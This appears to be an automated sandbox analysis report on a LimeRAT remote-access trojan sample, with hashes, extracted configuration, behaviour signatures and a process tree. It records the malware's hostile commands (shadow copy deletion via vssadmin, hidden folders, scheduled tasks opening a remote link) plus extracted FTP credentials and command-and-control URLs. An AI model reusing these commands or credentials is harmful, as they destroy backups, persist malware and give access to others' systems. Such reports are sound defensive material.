Analysis

  • max time kernel
    164s
  • max time network
    164s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-06-2024 20:57

General

  • Target

    ccc.exe

  • Size

    239KB

  • MD5

    161cd662c124f1408ccbd57a752a8d5f

  • SHA1

    7baad97316f0cbf1b35d9b0b2b3a8d19da852d41

  • SHA256

    61c5f76ed94eb63ad3a50b8225f2e795c7c6461e5f40bacb4ad8cadab276748e

  • SHA512

    ea72216157d4d502febc230700f4fd4279d7aab469a3b44cbafc99730df9431cbb9f64d0ab3e9d239a4faa869aa055a06198622b07a1f0408cfebdc9e23b20ac

  • SSDEEP

    6144:UCoE/UVPy/oCa+LDZWC9z5UNbbH5knq1diOJN:PozPygCa+DZMGnq1c8

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftp.encompossoftware.com
  • Port:
    21
  • Username:
    remoteuser
  • Password:
    Encomposx99

Extracted

Family

limerat

Wallets

False

Attributes
  • aes_key

    1

  • antivm

    false

  • c2_url

    https://pastebin.com/Fe5fxpeZ

  • download_payload

    false

  • install

    true

  • install_name

    svchost.exe

  • main_folder

    True

  • payload_url

    True

  • pin_spread

    true

  • sub_folder

    False

  • usb_spread

    false

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates connected drives 3 TTPs 15 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Disables Windows logging functionality 2 TTPs

    Changes registry settings to disable Windows Event logging.

  • Interacts with shadow copies 3 TTPs 12 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ccc.exe
    "C:\Users\Admin\AppData\Local\Temp\ccc.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Modifies Windows Defender Real-time Protection settings
    • Modifies security service
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3336
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4644
      • C:\Windows\system32\attrib.exe
        attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"
        3⤵
        • Views/modifies file attributes
        PID:2764
      • C:\Windows\system32\attrib.exe
        attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
        3⤵
        • Views/modifies file attributes
        PID:744
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2420
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin Delete Shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2016
      • C:\Windows\system32\vssadmin.exe
        vssadmin Delete Shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:1528
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1200
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
        3⤵
          PID:2736
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:5020
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
          3⤵
          • Interacts with shadow copies
          PID:4036
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4920
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:4676
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4116
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:4796
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4656
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:740
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:972
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:1176
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4228
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:896
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1608
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:2060
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2924
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:3860
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4368
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:2768
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4896
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:2196
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c Vssadmin delete shadowstorage /all /quiet
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:5100
        • C:\Windows\system32\vssadmin.exe
          Vssadmin delete shadowstorage /all /quiet
          3⤵
          • Interacts with shadow copies
          PID:2004
      • C:\Windows\SYSTEM32\schtasks.exe
        schtasks /create /f /st "06:39" /sc daily /mo "2" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"
        2⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3748
      • C:\Windows\SYSTEM32\schtasks.exe
        schtasks /create /f /st "07:55" /sc daily /mo "4" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"
        2⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2320
      • C:\Windows\SYSTEM32\schtasks.exe
        schtasks /create /f /st "17:29" /sc daily /mo "5" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"
        2⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4520
      • C:\Windows\SYSTEM32\schtasks.exe
        schtasks /create /f /st "15:00" /sc weekly /mo "3" /d "Tue" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"
        2⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2428
      • C:\Windows\SYSTEM32\schtasks.exe
        schtasks /create /f /st "06:57" /sc monthly /m "may" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"
        2⤵
        • Scheduled Task/Job: Scheduled Task
        PID:5044
      • C:\Users\Admin\AppData\Roaming\Branding\svchost.exe
        "C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"
        2⤵
        • Modifies WinLogon for persistence
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:984
        • C:\Windows\SYSTEM32\cmd.exe
          cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
          3⤵
          • Hide Artifacts: Hidden Files and Directories
          PID:3680
          • C:\Windows\system32\attrib.exe
            attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"
            4⤵
            • Views/modifies file attributes
            PID:2832
          • C:\Windows\system32\attrib.exe
            attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
            4⤵
            • Views/modifies file attributes
            PID:2120
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2400

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b53ab1jv.25w.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

      Filesize

      239KB

      MD5

      161cd662c124f1408ccbd57a752a8d5f

      SHA1

      7baad97316f0cbf1b35d9b0b2b3a8d19da852d41

      SHA256

      61c5f76ed94eb63ad3a50b8225f2e795c7c6461e5f40bacb4ad8cadab276748e

      SHA512

      ea72216157d4d502febc230700f4fd4279d7aab469a3b44cbafc99730df9431cbb9f64d0ab3e9d239a4faa869aa055a06198622b07a1f0408cfebdc9e23b20ac

    • memory/2420-14-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp

      Filesize

      10.8MB

    • memory/2420-2-0x0000021AE9620000-0x0000021AE9642000-memory.dmp

      Filesize

      136KB

    • memory/2420-12-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp

      Filesize

      10.8MB

    • memory/2420-13-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp

      Filesize

      10.8MB

    • memory/2420-15-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp

      Filesize

      10.8MB

    • memory/2420-18-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp

      Filesize

      10.8MB

    • memory/3336-1-0x0000019D64BA0000-0x0000019D64BE2000-memory.dmp

      Filesize

      264KB

    • memory/3336-20-0x00007FF8DA3A3000-0x00007FF8DA3A5000-memory.dmp

      Filesize

      8KB

    • memory/3336-21-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp

      Filesize

      10.8MB

    • memory/3336-0-0x00007FF8DA3A3000-0x00007FF8DA3A5000-memory.dmp

      Filesize

      8KB

    • memory/3336-33-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp

      Filesize

      10.8MB